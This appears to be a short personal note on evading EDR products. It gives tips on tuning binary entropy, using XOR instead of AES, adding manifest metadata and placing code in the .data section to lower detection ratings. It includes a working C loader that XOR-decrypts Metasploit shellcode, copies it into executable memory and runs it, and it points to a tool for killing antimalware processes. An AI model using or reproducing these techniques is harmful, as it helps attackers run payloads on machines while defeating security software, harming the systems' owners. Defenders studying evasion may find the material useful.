EDR Evasion

Entropy:

EDR look for a low entropy (normally using Shannon Entropy) aiming for an entropy between 4.8 and 7.2 (use pestudio to measure)

Encryption:

XOR keeps a lower entropy - AES increases entropy

Metadata:

add an empty manifest file to VisualStudio (auto fills with metadata) - change the name to manifest executable. This has a good reaction to static analysis of EDR, making it non-identifiable. Also adding legitimate metadata in the form of a manifest file reduced the entropy from 5.033 to 4.922.

.data:

Moving the code block to a global variable (.data) decreased the entropy & risk rating if it was identified from a medium to low risk on EDR (non-detectable)

#include <stdio.h>
#include <windows.h>

    // Replace your XOR encrypted MSF-Shellcode
	unsigned char code[] = "\xa6\x12\xd9\xbe\xaa\xb2\x96\...";

int main() {

	// Decrypt XOR encrpyted MSF-Shellcode
	char key = 'ABCD';
	int i = 0;
	for (i; i < sizeof(code) - 1; i++)
	{
		code[i] = code[i] ^ key;
	}

	
	// Allocate memory for the decrypted MSF-Shellcode 
	void* exec = VirtualAlloc(0, sizeof code, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	// Copy the MSF-Shellcode into the allocated memory 
	memcpy(exec, code, sizeof code);

	// Execute the decrypted MSF-Shellcode in memory 
	((void(*)())exec)();
	return 0;

}

GitHub - Yaxser/Backstab: A tool to kill antimalware protected processesGitHub